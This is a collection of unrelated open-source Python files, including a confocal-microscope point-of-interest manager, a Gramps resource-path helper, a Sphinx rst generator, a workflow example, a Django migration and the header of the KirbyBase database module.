self.log.error('G. The given POI ({0}) does not exist.'.format(
poikey))
return [-1., -1., -1.]
def set_new_position(self, poikey=None, newpos=None):
"""
Moves the given POI to a new position, and uses this information to update
the sample position.
@param string poikey: the key of the poi
@param float[3] newpos: coordinates of the new position
@return int: error code (0:OK, -1:error)
"""
# If no new position is given, take the current confocal crosshair position
if newpos is None:
newpos = self._confocal_logic.get_position()
if poikey is not None and poikey in self.poi_list.keys():
if len(newpos) != 3:
self.log.error('Length of set poi is not 3.')
return -1
# Add new position to trace of POI
self.poi_list[poikey].add_position_to_history(position=newpos)
# Calculate sample shift and add it to the trace of 'sample' POI
sample_shift = newpos - self.get_poi_position(poikey=poikey)
sample_shift += self.poi_list['sample'].get_position_history()[-1, :][1:4]
self.poi_list['sample'].add_position_to_history(position=sample_shift)
# signal POI has been updated (this will cause GUI to redraw)
            if (poikey != 'crosshair') and (poikey != 'sample'):
self.signal_poi_updated.emit()
return 0
self.log.error('J. The given POI ({0}) does not exist.'.format(poikey))
return -1
def move_coords(self, poikey=None, newpos=None):
"""Updates the coords of a given POI, and adds a position to the POI history,
but DOES NOT update the sample position.
"""
if newpos is None:
newpos = self._confocal_logic.get_position()
if poikey is not None and poikey in self.poi_list.keys():
if len(newpos) != 3:
self.log.error('Length of set poi is not 3.')
return -1
this_poi = self.poi_list[poikey]
return_val = this_poi.add_position_to_history(position=newpos)
sample_pos = self.poi_list['sample'].get_position_history()[-1, :][1:4]
new_coords = newpos - sample_pos
this_poi.set_coords_in_sample(new_coords)
self.signal_poi_updated.emit()
return return_val
self.log.error('JJ. The given POI ({0}) does not exist.'.format(poikey))
return -1
def rename_poi(self, poikey=None, name=None, emit_change=True):
""" Sets the name of the given poi.
@param string poikey: the key of the poi
@param string name: name of the poi to be set
@return int: error code (0:OK, -1:error)
"""
if poikey is not None and name is not None and poikey in self.poi_list.keys():
success = self.poi_list[poikey].set_name(name=name)
# if this is the active POI then we need to update poi tag in savelogic
if self.poi_list[poikey] == self.active_poi:
self.update_poi_tag_in_savelogic()
if emit_change:
self.signal_poi_updated.emit()
return success
else:
self.log.error('AAAThe given POI ({0}) does not exist.'.format(
poikey))
return -1
def start_periodic_refocus(self, poikey=None):
""" Starts the perodic refocussing of the poi.
@param float duration: (optional) the time between periodic optimization
@param string poikey: (optional) the key of the poi to be set and refocussed on.
@return int: error code (0:OK, -1:error)
"""
if poikey is not None and poikey in self.poi_list.keys():
self._current_poi_key = poikey
else:
# Todo: warning message that active POI used by default
self._current_poi_key = self.active_poi.get_key()
self.log.info('Periodic refocus on {0}.'.format(self._current_poi_key))
self.timer_step = 0
self.timer = QtCore.QTimer()
self.timer.setSingleShot(False)
self.timer.timeout.connect(self._periodic_refocus_loop)
self.timer.start(300)
self.signal_periodic_opt_started.emit()
return 0
def set_periodic_optimize_duration(self, duration=None):
""" Change the duration of the periodic optimize timer during active
periodic refocussing.
@param float duration: (optional) the time between periodic optimization.
"""
if duration is not None:
self.timer_duration = duration
else:
self.log.warning('No timer duration given, using {0} s.'.format(
self.timer_duration))
self.signal_periodic_opt_duration_changed.emit()
def _periodic_refocus_loop(self):
""" This is the looped function that does the actual periodic refocus.
        If the time has run out, it refocusses the current poi.
Otherwise it just updates the time that is left.
"""
self.time_left = self.timer_step - time.time() + self.timer_duration
self.signal_timer_updated.emit()
if self.time_left <= 0:
self.timer_step = time.time()
self.optimise_poi(poikey=self._current_poi_key)
def stop_periodic_refocus(self):
""" Stops the perodic refocussing of the poi.
@return int: error code (0:OK, -1:error)
"""
if self.timer is None:
self.log.warning('No timer to stop.')
return -1
self.timer.stop()
self.timer = None
self.signal_periodic_opt_stopped.emit()
return 0
def _refocus_done(self, caller_tag, optimal_pos):
""" Gets called automatically after the refocus is done and saves the new position
to the poi history.
Also it tracks the sample and may go back to the crosshair.
@return int: error code (0:OK, -1:error)
"""
# We only need x, y, z
optimized_position = optimal_pos[0:3]
# If the refocus was on the crosshair, then only update crosshair POI and don't
# do anything with sample position.
caller_tags = ['confocalgui', 'magnet_logic', 'singleshot_logic']
if caller_tag in caller_tags:
self.poi_list['crosshair'].add_position_to_history(position=optimized_position)
# If the refocus was initiated here by poimanager, then update POI and sample
elif caller_tag == 'poimanager':
if self._current_poi_key is not None and self._current_poi_key in self.poi_list.keys():
self.set_new_position(poikey=self._current_poi_key, newpos=optimized_position)
if self.go_to_crosshair_after_refocus:
temp_key = self._current_poi_key
self.go_to_poi(poikey='crosshair')
self._current_poi_key = temp_key
else:
self.go_to_poi(poikey=self._current_poi_key)
return 0
else:
self.log.error('W. The given POI ({0}) does not exist.'.format(
self._current_poi_key))
return -1
else:
self.log.error('Unknown caller_tag for the optimizer. POI '
'Manager does not know what to do with optimized '
'position, and has done nothing.'
)
def reset_roi(self):
del self.poi_list
self.poi_list = dict()
self.roi_name = ''
        # initially add crosshair to the POIs
crosshair = PoI(pos=[0, 0, 0], name='crosshair')
crosshair._key = 'crosshair'
self.poi_list[crosshair._key] = crosshair
# Re-initialise sample in the poi list
sample = PoI(pos=[0, 0, 0], name='sample')
sample._key = 'sample'
self.poi_list[sample._key] = sample
self.signal_poi_updated.emit()
def set_active_poi(self, poikey=None):
"""
Set the active POI object.
"""
if poikey is None:
# If poikey is none and no active poi is set, then do nothing
if self.active_poi is None:
return
else:
self.active_poi = None
elif poikey in self.get_all_pois():
# If poikey is the current active POI then do nothing
if self.poi_list[poikey] == self.active_poi:
return
else:
self.active_poi = self.poi_list[poikey]
else:
# todo: error poikey unknown
return -1
self.update_poi_tag_in_savelogic()
self.signal_poi_updated.emit() # todo: this breaks the emit_change = false case
def _deactivate_poi(self):
self.set_active_poi(poikey=None)
def update_poi_tag_in_savelogic(self):
if self.active_poi is not None:
self._save_logic.active_poi_name = self.active_poi.get_name()
else:
self._save_logic.active_poi_name = ''
def save_poi_map_as_roi(self):
'''Save a list of POIs with their coordinates to a file.
'''
# File path and name
filepath = self._save_logic.get_path_for_module(module_name='ROIs')
        # We will fill the data OrderedDict to send to savelogic
data = OrderedDict()
# Lists for each column of the output file
poinames = []
poikeys = []
x_coords = []
y_coords = []
z_coords = []
for poikey in self.get_all_pois(abc_sort=True):
            if poikey != 'sample' and poikey != 'crosshair':
thispoi = self.poi_list[poikey]
poinames.append(thispoi.get_name())
poikeys.append(poikey)
x_coords.append(thispoi.get_coords_in_sample()[0])
y_coords.append(thispoi.get_coords_in_sample()[1])
z_coords.append(thispoi.get_coords_in_sample()[2])
data['POI Name'] = np.array(poinames)
data['POI Key'] = np.array(poikeys)
data['X'] = np.array(x_coords)
data['Y'] = np.array(y_coords)
data['Z'] = np.array(z_coords)
self._save_logic.save_data(data, filepath=filepath, filelabel=self.roi_name,
fmt=['%s', '%s', '%.6e', '%.6e', '%.6e'])
self.log.debug('ROI saved to:\n{0}'.format(filepath))
return 0
def load_roi_from_file(self, filename=None):
if filename is None:
return -1
roifile = open(filename, 'r')
for line in roifile:
if line[0] != '#' and line.split()[0] != 'NaN':
saved_poi_name = line.split()[0]
saved_poi_key = line.split()[1]
saved_poi_coords = [
float(line.split()[2]), float(line.split()[3]), float(line.split()[4])]
this_poi_key = self.add_poi(position=saved_poi_coords, key=saved_poi_key, emit_change=False)
self.rename_poi(poikey=this_poi_key, name=saved_poi_name, emit_change=False)
roifile.close()
# Now that all the POIs are created, emit the signal for other things (ie gui) to update
self.signal_poi_updated.emit()
return 0
def triangulate(self, r, a1, b1, c1, a2, b2, c2):
""" Reorients a coordinate r that is known relative to reference points a1, b1, c1 to
produce a new vector rnew that has exactly the same relation to rotated/shifted/tilted
reference positions a2, b2, c2.
@param np.array r: position to be remapped.
@param np.array a1: initial location of ref1.
@param np.array a2: final location of ref1.
@param np.array b1, b2, c1, c2: similar for ref2 and ref3
"""
ab_old = b1 - a1
ac_old = c1 - a1
ab_new = b2 - a2
ac_new = c2 - a2
# Firstly, find the angle to rotate ab_old onto ab_new. This rotation must be done in
# the plane that contains these two vectors, which means rotating about an axis
# perpendicular to both of them (the cross product).
axis1 = np.cross(ab_old, ab_new) # Only works if ab_old and ab_new are not parallel
axis1length = np.sqrt((axis1 * axis1).sum())
if axis1length == 0:
ab_olddif = ab_old + np.array([100, 0, 0])
axis1 = np.cross(ab_old, ab_olddif)
# normalising the axis1 vector
axis1 = axis1 / np.sqrt((axis1 * axis1).sum())
# The dot product gives the angle between ab_old and ab_new
dot = np.dot(ab_old, ab_new)
x_modulus = np.sqrt((ab_old * ab_old).sum())
y_modulus = np.sqrt((ab_new * ab_new).sum())
# float errors can cause the division to be slightly above 1 for 90 degree rotations, which
# will confuse arccos.
cos_angle = min(dot / x_modulus / y_modulus, 1)
angle1 = np.arccos(cos_angle) # angle in radians
# Construct a rotational matrix for axis1
n1 = axis1[0]
n2 = axis1[1]
n3 = axis1[2]
m1 = np.matrix(((((n1 * n1) * (1 - np.cos(angle1)) + np.cos(angle1)),
((n1 * n2) * (1 - np.cos(angle1)) - n3 * np.sin(angle1)),
((n1 * n3) * (1 - np.cos(angle1)) + n2 * np.sin(angle1))
),
(((n2 * n1) * (1 - np.cos(angle1)) + n3 * np.sin(angle1)),
((n2 * n2) * (1 - np.cos(angle1)) + np.cos(angle1)),
((n2 * n3) * (1 - np.cos(angle1)) - n1 * np.sin(angle1))
),
(((n3 * n1) * (1 - np.cos(angle1)) - n2 * np.sin(angle1)),
((n3 * n2) * (1 - np.cos(angle1)) + n1 * np.sin(angle1)),
((n3 * n3) * (1 - np.cos(angle1)) + np.cos(angle1))
)
)
)
# Now that ab_old can be rotated to overlap with ab_new, we need to rotate in another
# axis to fix "tilt". By choosing ab_new as the rotation axis we ensure that the
# ab vectors stay where they need to be.
# ac_old_rot is the rotated ac_old (around axis1). We need to find the angle to rotate
# ac_old_rot around ab_new to get ac_new.
ac_old_rot = np.array(np.dot(m1, ac_old))[0]
axis2 = -ab_new # TODO: check maths to find why this negative sign is necessary. Empirically it is now working.
axis2 = axis2 / np.sqrt((axis2 * axis2).sum())
# To get the angle of rotation it is most convenient to work in the plane for which axis2 is the normal.
# We must project vectors ac_old_rot and ac_new into this plane.
a = ac_old_rot - np.dot(ac_old_rot, axis2) * axis2 # projection of ac_old_rot in the plane of rotation about axis2
b = ac_new - np.dot(ac_new, axis2) * axis2 # projection of ac_new in the plane of rotation about axis2
# The dot product gives the angle of rotation around axis2
dot = np.dot(a, b)
x_modulus = np.sqrt((a * a).sum())
y_modulus = np.sqrt((b * b).sum())
cos_angle = min(dot / x_modulus / y_modulus, 1) # float errors can cause the division to be slightly above 1 for 90 degree rotations, which will confuse arccos.
angle2 = np.arccos(cos_angle) # angle in radians
# Construct a rotation matrix around axis2
n1 = axis2[0]
n2 = axis2[1]
n3 = axis2[2]
m2 = np.matrix(((((n1 * n1) * (1 - np.cos(angle2)) + np.cos(angle2)),
((n1 * n2) * (1 - np.cos(angle2)) - n3 * np.sin(angle2)),
((n1 * n3) * (1 - np.cos(angle2)) + n2 * np.sin(angle2))
),
(((n2 * n1) * (1 - np.cos(angle2)) + n3 * np.sin(angle2)),
((n2 * n2) * (1 - np.cos(angle2)) + np.cos(angle2)),
((n2 * n3) * (1 - np.cos(angle2)) - n1 * np.sin(angle2))
),
(((n3 * n1) * (1 - np.cos(angle2)) - n2 * np.sin(angle2)),
((n3 * n2) * (1 - np.cos(angle2)) + n1 * np.sin(angle2)),
((n3 * n3) * (1 - np.cos(angle2)) + np.cos(angle2))
)
)
)
# To find the new position of r, displace by (a2 - a1) and do the rotations
a1r = r - a1
rnew = a2 + np.array(np.dot(m2, np.array(np.dot(m1, a1r))[0]))[0]
return rnew
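    # Editor's note: a hedged sanity-check sketch for triangulate(), added for
    # illustration and not part of the original module. For a pure translation
    # of the reference points, every mapped point should shift by that offset:
    #     a1 = np.array([0., 0., 0.])
    #     b1 = np.array([0., 1., 0.])
    #     c1 = np.array([1., 0., 0.])
    #     shift = np.array([5., 5., 5.])
    #     self.triangulate(np.array([2., 3., 0.]), a1, b1, c1,
    #                      a1 + shift, b1 + shift, c1 + shift)
    #     # -> approximately array([7., 8., 5.])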
def reorient_roi(self, ref1_coords, ref2_coords, ref3_coords, ref1_newpos, ref2_newpos, ref3_newpos):
""" Move and rotate the ROI to a new position specified by the newpos of 3 reference POIs from the saved ROI.
@param ref1_coords: coordinates (from ROI save file) of reference 1.
@param ref2_coords: similar, ref2.
@param ref3_coords: similar, ref3.
@param ref1_newpos: the new (current) position of POI reference 1.
@param ref2_newpos: similar, ref2.
@param ref3_newpos: similar, ref3.
"""
for poikey in self.get_all_pois(abc_sort=True):
            if poikey != 'sample' and poikey != 'crosshair':
thispoi = self.poi_list[poikey]
old_coords = thispoi.get_coords_in_sample()
new_coords = self.triangulate(old_coords, ref1_coords, ref2_coords, ref3_coords, ref1_newpos, ref2_newpos, ref3_newpos)
self.move_coords(poikey=poikey, newpos=new_coords)
def autofind_pois(self, neighborhood_size=1, min_threshold=10000, max_threshold=1e6):
"""Automatically search the xy scan image for POIs.
@param neighborhood_size: size in microns. Only the brightest POI per neighborhood will be found.
@param min_threshold: POIs must have c/s above this threshold.
@param max_threshold: POIs must have c/s below this threshold.
"""
# Calculate the neighborhood size in pixels from the image range and resolution
x_range_microns = np.max(self.roi_map_data[:, :, 0]) - np.min(self.roi_map_data[:, :, 0])
y_range_microns = np.max(self.roi_map_data[:, :, 1]) - np.min(self.roi_map_data[:, :, 1])
y_pixels = len(self.roi_map_data)
x_pixels = len(self.roi_map_data[1, :])
pixels_per_micron = np.max([x_pixels, y_pixels]) / np.max([x_range_microns, y_range_microns])
# The neighborhood in pixels is nbhd_size * pixels_per_um, but it must be 1 or greater
neighborhood_pix = int(np.max([math.ceil(pixels_per_micron * neighborhood_size), 1]))
data = self.roi_map_data[:, :, 3]
data_max = filters.maximum_filter(data, neighborhood_pix)
maxima = (data == data_max)
data_min = filters.minimum_filter(data, 3 * neighborhood_pix)
diff = ((data_max - data_min) > min_threshold)
        maxima[~diff] = 0  # zero out maxima where the contrast is below min_threshold
labeled, num_objects = ndimage.label(maxima)
xy = np.array(ndimage.center_of_mass(data, labeled, range(1, num_objects + 1)))
for count, pix_pos in enumerate(xy):
            poi_pos = self.roi_map_data[int(pix_pos[0]), int(pix_pos[1]), :][0:3]
this_poi_key = self.add_poi(position=poi_pos, emit_change=False)
self.rename_poi(poikey=this_poi_key, name='spot' + str(count), emit_change=False)
# Now that all the POIs are created, emit the signal for other things (ie gui) to update
self.signal_poi_updated.emit()
# === childresslab/MicrocavityExp1 :: logic/poi_manager_logic.py | Python | gpl-3.0 | 35,041 bytes ===
# coding: utf-8
"""
MIT License
Copyright (c) 2019 Claude SIMON (https://q37.info/s/rmnmqd49)
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import sys
sys.path.append("workshop/_")
import educ as _
from accessor import *
# from constants import *
from items import *
from helpers import *
_.setEnums(globals(),"label",(
"Restart",
"SecretWord",
"Letter",
"Expected",
"Obtained",
"True",
"False"
))
# === epeios-q37/epeios :: other/exercises/Hangman/workshop/_/_.py | Python | agpl-3.0 | 1,462 bytes ===
import boto.swf.layer2 as swf
from garcon import activity
from garcon import runner
import logging
import random
logger = logging.getLogger(__name__)
domain = 'dev'
name = 'workflow_sample'
create = activity.create(domain, name)
def activity_failure(context, activity):
num = int(random.random() * 4)
if num != 3:
logger.warn('activity_3: fails')
raise Exception('fails')
print('activity_3: end')
test_activity_1 = create(
name='o',
run=runner.Sync(
lambda context, activity: logger.debug('activity_1')))
test_activity_2 = create(
name='activity_2',
requires=[test_activity_1],
run=runner.Async(
lambda context, activity: logger.debug('activity_2_task_1'),
lambda context, activity: logger.debug('activity_2_task_2')))
test_activity_3 = create(
name='activity_3',
retry=10,
requires=[test_activity_1],
run=runner.Sync(activity_failure))
test_activity_4 = create(
name='activity_4',
requires=[test_activity_3, test_activity_2],
run=runner.Sync(
lambda context, activity: logger.debug('activity_4')))
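# Editor's note, added for illustration (not part of the original example):
# the `requires` lists above define the dependency graph Garcon walks --
#     test_activity_1 --> test_activity_2 (two async tasks) ----+
#     test_activity_1 --> test_activity_3 (flaky, retry=10) ----+--> test_activity_4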
# === pkuong/garcon :: example/test_flow.py | Python | mit | 1,119 bytes ===
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('package', '0004_package_parsed_pkgbuild'),
]
operations = [
migrations.AddField(
model_name='package',
name='extra_deps',
field=models.TextField(default=''),
),
]
# === maikelwever/autoaurbuilder :: autoaurbuilder/package/migrations/0005_package_extra_deps.py | Python | gpl-3.0 | 407 bytes ===
#
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2013 John Ralls <jralls@ceridwen.us>
# Copyright (C) 2020 Nick Hall <nick-h@gramps-project.org>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
import sys
import os
import logging
LOG = logging.getLogger("ResourcePath")
_hdlr = logging.StreamHandler()
_hdlr.setFormatter(logging.Formatter(fmt="%(name)s.%(levelname)s: %(message)s"))
LOG.addHandler(_hdlr)
from ..constfunc import get_env_var
class ResourcePath:
"""
ResourcePath is a singleton, meaning that only one of them is ever
created. At startup it finds the paths to Gramps's resource files and
caches them for future use.
It should be called only by const.py; other code should retrieve the
paths from there.
Attempt to derive the resource path from the package path assuming that
one of the three main installation schemes has been used.
The package path will be one of the following:
<prefix>/lib/pythonX.Y/site-packages
<prefix>\Lib\site-packages
<home>/lib/python
<userbase>/lib/pythonX.Y/site-packages
<userbase>\PythonXY\site-packages
Where <prefix>, <home> and <userbase> are the resource paths used in the
Prefix, Home and User installation schemes.
The use of the command line option "--install-data" in the setup script
is no longer supported.
"""
instance = None
def __new__(cls):
if not cls.instance:
cls.instance = super(ResourcePath, cls).__new__(cls)
cls.instance.initialized = False
return cls.instance
def __init__(self):
if self.initialized:
return
package_path = os.path.abspath(os.path.join(os.path.dirname(
__file__), '..', "..", ".."))
installed = not os.path.exists(os.path.join(package_path, '.git'))
if installed:
test_path = os.path.join("gramps", "authors.xml")
else:
test_path = os.path.join("data", "authors.xml")
resource_path = None
tmp_path = get_env_var('GRAMPS_RESOURCES')
if (tmp_path and os.path.exists(os.path.join(tmp_path, test_path))):
resource_path = tmp_path
elif installed:
base_path = None
head, tail = os.path.split(package_path)
if tail in ('site-packages', 'dist-packages'):
# Prefix or User installation scheme
head, tail = os.path.split(head)
if tail.startswith('python'):
base_path, tail = os.path.split(head)
elif tail == 'Lib' or tail.startswith('Python'):
base_path = head
elif tail == 'python':
# Home installation scheme
base_path, tail = os.path.split(head)
if base_path is not None:
resource_path = os.path.join(base_path, 'share')
else:
LOG.error("Unable to determine resource path")
sys.exit(1)
else:
# Let's try to run from source without env['GRAMPS_RESOURCES']:
resource_path = package_path
if (not os.path.exists(os.path.join(resource_path, test_path))):
LOG.error("Resource Path %s is invalid", resource_path)
sys.exit(1)
resource_path = os.path.abspath(resource_path)
if installed:
self.locale_dir = os.path.join(resource_path, 'locale')
self.data_dir = os.path.join(resource_path, 'gramps')
self.image_dir = os.path.join(resource_path, 'gramps', 'images')
self.doc_dir = os.path.join(resource_path, 'doc', 'gramps')
else:
self.locale_dir = os.path.join(resource_path, 'build', 'mo')
self.image_dir = os.path.join(resource_path, 'images')
self.data_dir = os.path.join(resource_path, 'data')
self.doc_dir = os.path.join(resource_path, 'build', 'data')
self.initialized = True
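# Editor's note: a hedged usage sketch, not part of the original module.
# Because ResourcePath is a singleton, repeated construction returns the same
# instance with the cached paths; const.py is expected to read them like:
#     _res = ResourcePath()
#     DATA_DIR = _res.data_dir
#     LOCALE_DIR = _res.locale_dir
#     ResourcePath() is _res    # -> True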
# === SNoiraud/gramps :: gramps/gen/utils/resourcepath.py | Python | gpl-2.0 | 4,665 bytes ===
#! /usr/bin/python
import sys, re, os
def generateFile(input_directory, file_name, output_directory,
package_heirarchy=None, module_name=None):
"""Generate a rst file telling sphinx to just generate documentation
for the public interface automatically. Output will be written to
*file_name*.rst in the current directory.
:param input_directory: a string specifying the directory containing the
source code file
:param file_name: the name of the python source code file to generate
a sphinx rst file describing
    :param output_directory: a string specifying the directory where
the generated rst file should be placed. If *output_directory* does
not already exist, it will be created
:param package_heirarchy: a list of strings, where each name is
the name of a package, in the order of the hierarchy
:param module_name: the name of the module. If not given, the .py is
removed from *file_name* to produce the module_name
"""
#Stick all output into a list of strings, then just join it and output
#it all in on go.
output = []
# Create the output directory if it doesn't already exist. Note that
# if the directory is created between the check and the creation, it
    # might cause issues, but I don't think this is at all likely to happen
if not os.path.exists(output_directory):
try:
os.makedirs(output_directory)
except OSError as e:
print "Error creating the output directory"
print e.args
try:
#Open the file
f = open(os.path.join(input_directory, file_name), 'r')
#Do the module output
if not module_name:
            module_name = re.search(r'(\w+)\.py$', file_name).group(1)
#Append the package names, if there are any
full_module_name = module_name
if package_heirarchy:
full_module_name = '.'.join(package_heirarchy) + '.' + module_name
output.append(full_module_name)
output.append('=' * len(full_module_name))
output.append('.. automodule:: %s\n' % full_module_name)
#Read the file, and do output for classes
class_reg = re.compile('^class (\w+)')
func_reg = re.compile('^def ((?:[a-zA-Z0-9]+_)*[a-zA-Z0-9]+)')
#We don't need a blank line between autofunction directives, but we do
#need one between autofunctions and headings etc. for classes. This
#keeps track if we're switching from autofunctions to classes, so we
#can add that blank line.
finding_functions = False
for line in iter(f):
#Search for classes
match = class_reg.match(line)
if match is not None:
if finding_functions:
output.append('')
finding_functions = False
class_name = match.group(1)
output.append(class_name)
output.append('-' * len(class_name))
output.append('''.. autoclass:: %s
:members:
:show-inheritance:
''' % class_name)
#Search for top level functions
else:
match = func_reg.match(line)
if match is not None:
func_name = match.group(1)
output.append('.. autofunction:: ' + func_name)
finding_functions = True
f.close()
except IOError as e:
print "Error opening the input file : ", os.path.join(input_directory, file_name)
print e.args[1]
else:
#Write the output
try:
output_file_name = os.path.join(output_directory, module_name) + '.rst'
f = open(output_file_name, 'w')
            f.write('\n'.join(output))
            f.close()
except IOError as e:
print "Error opening the output file : ", output_file_name
print e.args[1]
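#Hedged usage sketch (the names below are illustrative, not from this
#script): generating a stub for mypkg/utils.py into docs/mypkg would be
#
#   generateFile('mypkg', 'utils.py', 'docs/mypkg',
#                package_heirarchy=['mypkg'], module_name='utils')
#
#which writes docs/mypkg/utils.rst containing the automodule, autoclass,
#and autofunction directives for sphinx to expand.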
def generateIndex(module_list, output_directory):
"""Create an index.rst file for sphinx in the given directory.
:param module_list: a list of the names of the modules to list in
the index file
:param output_directory: the directory to create the index file in
"""
#Sort the module_list
module_list.sort()
try:
#open the file
f = open(os.path.join(output_directory, 'index.rst'), 'w')
#Do the output
f.write(""".. Yum documentation master file, created by
sphinx-quickstart on Mon Jun 27 14:01:20 2011.
You can adapt this file completely to your liking, but it should at least
contain the root `toctree` directive.
Welcome to Yum's documentation!
===============================
Contents:
.. toctree::
:maxdepth: 2
""")
f.write('\n '.join(module_list))
f.write("""
Indices and tables
==================
* :ref:`genindex`
* :ref:`modindex`
* :ref:`search`
""")
except IOError as e:
print "Error opening the output file."
print e.args[1]
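#Hedged usage sketch (module names assumed): after generating the stubs,
#an index listing them could be produced with
#
#   generateIndex(['yum', 'rpmUtils'], 'docs')
#
#which writes docs/index.rst with a toctree naming both modules.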
def generateAll(source_directory, output_directory):
    """Generate rst stubs for every python source file found under
    *source_directory*, mirroring its layout under *output_directory*,
    then write an index.rst listing all generated modules.
    """
# Keep a set of file names that are packages. This is
# useful so that later we will be able to figure out full
# module names.
packages = set()
# Keep a list of tuples containing python module names and
# relative paths, so that we can build the index file later
modules = []
# Walk the directory tree
for dirpath, dirnames, filenames in os.walk(source_directory, topdown=True):
# print dirpath
# print dirnames
# print filenames
# print
        # Add the current directory to packages if __init__.py exists
if '__init__.py' in filenames:
packages.add(dirpath)
# Find the hierarchy of packages that we are currently in
package_heirarchy = []
        #Recurse up to the root (note: assumes POSIX paths, stops at '/')
dirpath_i = dirpath
while dirpath_i != '/':
if dirpath_i in packages:
dirpath_i, tail = os.path.split(dirpath_i)
package_heirarchy.insert(0, tail)
else:
break
# Find the relative output directory, mirroring the input
# directory structure
relative_output_directory = ''
if not os.path.samefile(dirpath, source_directory):
relative_output_directory = os.path.relpath(dirpath, source_directory)
# Don't recurse into directories that are hidden, or for docs
        # (iterate over a copy: removing from dirnames in place prunes the
        # walk, but mutating the list while iterating it would skip entries)
        for directory in dirnames[:]:
            if directory == "docs" or directory.startswith("."):
                dirnames.remove(directory)
# Generate the rst for a file if it is a python source code file
for file_name in filenames:
# Skip file names that contain dashes, since they're not
# valid module names, so we won't be able to import them
# to generate the documentation anyway
if '-' in file_name:
continue
if file_name.endswith('.py'):
module_name = file_name.partition('.')[0]
modules.append(os.path.join(relative_output_directory,
module_name))
generateFile(dirpath, file_name,
os.path.join(output_directory, relative_output_directory),
package_heirarchy, module_name)
# Create the index.rst file
generateIndex(modules, output_directory)
if __name__ == "__main__":
generateAll(os.getcwd(), os.getcwd())
| pnasrat/yum | docs/sphinxdocs/rstgenerator.py | Python | gpl-2.0 | 7,752 |
"""
DOSBox-FS launcher script used for testing.
"""
import sys
from fsgamesys.plugins.pluginmanager import PluginManager
def app_main():
executable = PluginManager.instance().find_executable("dosbox-fs")
process = executable.popen(sys.argv[1:])
process.wait()
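# Minimal sketch (an assumption, not in the original launcher): the
# launcher framework normally imports this module and calls app_main()
# itself, but for standalone testing one could add:
#
#     if __name__ == "__main__":
#         app_main()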
| FrodeSolheim/fs-uae-launcher | launcher/apps/dosbox_fs.py | Python | gpl-2.0 | 276 |
# Be careful, this version is tweaked by Malte to avoid raising string exceptions...
"""Contains classes for a plain-text, client-server dbms.
Classes:
KirbyBase - database class
KBError - exceptions
Example:
from db import *
db = KirbyBase()
db.create('plane.tbl', ['name:str', 'country:str', 'speed:int',
'range:int'])
db.insert('plane.tbl', ['P-51', 'USA', 403, 1201])
db.insert('plane.tbl', ['P-38', 'USA', 377, 999])
db.select('plane.tbl', ['country', 'speed'], ['USA', '>400'])
db.update('plane.tbl', ['country'], ['USA'], ['United States'],
['country'])
db.delete('plane.tbl', ['speed'], ['<400'])
db.close()
Author:
Jamey Cribbs -- jcribbs@twmi.rr.com
www.netpromi.com
History:
2003-04-08: Version 1.0 released.
2003-04-15: Version 1.01 released.
-Added getFieldNames method.
-Added getFieldTypes method.
-Added drop method.
-Added check for existing file in create method.
-Improved documentation.
2003-07-16: Version 1.02 released.
-KirbyBase now uses distutils for installation.
-Fixed bug in createTable where field list was getting modified.
-Fixed bug in insert where values list was getting modified.
-Added the ability to use special characters in table data such
as \r, \n, \032, and |.
-Changed the name of all private methods to start with two
underscores, thereby following recommended naming conventions.
-Improved documentation.
-Added licensing information.
2003-08-14: Version 1.3 released.
-Added len method.
-Fixed bug in validateMatchCriteria where script was not
restricting other match criteria if already attempting to match
by recno.
-Fixed bug in validateMatchCriteria where script was not checking
to see if pattern argument was an integer when attempting to
match by recno.
-Added ability to pass field values to update and insert using a
dictionary.
-Added ability to specify field to sort on and sort direction for
the results of a select.
-Changed the way field types are handled internally. Instead of
treating them as strings (which is how they are stored) and
having to constantly 'eval' them to get the type, I decided to
work with them in their 'native' format. This should not change
any of the api or interfaces, EXCEPT for the getFieldTypes
method, which now returns a list of types, instead of a list of
strings. I hope this doesn't screw anyone's programs up.
-Corrected version number to conform to guidelines in distutils
documentation.
2003-08-27: Version 1.4 released.
-Added two new database field types: datetime.date and
datetime.datetime. They are stored as strings, but are input and
output as instances of datetime.date and datetime.datetime
respectively.
-Made a few internal optimizations when running queries that have
resulted in a 15-20% speed increase when doing large queries or
updates.
-Changed the name of all private methods from starting with two
underscores to starting with one underscore based on a discussion
in comp.lang.python as to how to properly name private variables.
2003-09-02: Version 1.5 released.
-Changed the way queries are handled internally. Instead of doing
an eval to do numeric and datetime comparisons, I changed it to do
the actual comparison itself. This resulted in a 40% speed
increase on large queries that do comparison expressions.
-Changed how data is passed between the server and the client in
client/server mode. I now use cPickle instead of repr and eval.
This resulted in an approximately 40% speed increase in
client/server operations.
2004-06-10: Version 1.5.1 released.
-Added a new database field type: boolean.
-Fixed a bug where KirbyBase was trying to convert an empty table
     field (i.e. '') back into its native format such as int or float
     and raising an Exception. Now, if a table field is empty, I just
     append it to the result record as is and don't try to convert it.
-getMatches method will now split each database record only up to
the number of fields required to satisfy the query. This should
save a little query time on large databases with many fields.
-Added ability to have the getMatches method match string fields
based on string equality rather than regular expressions.
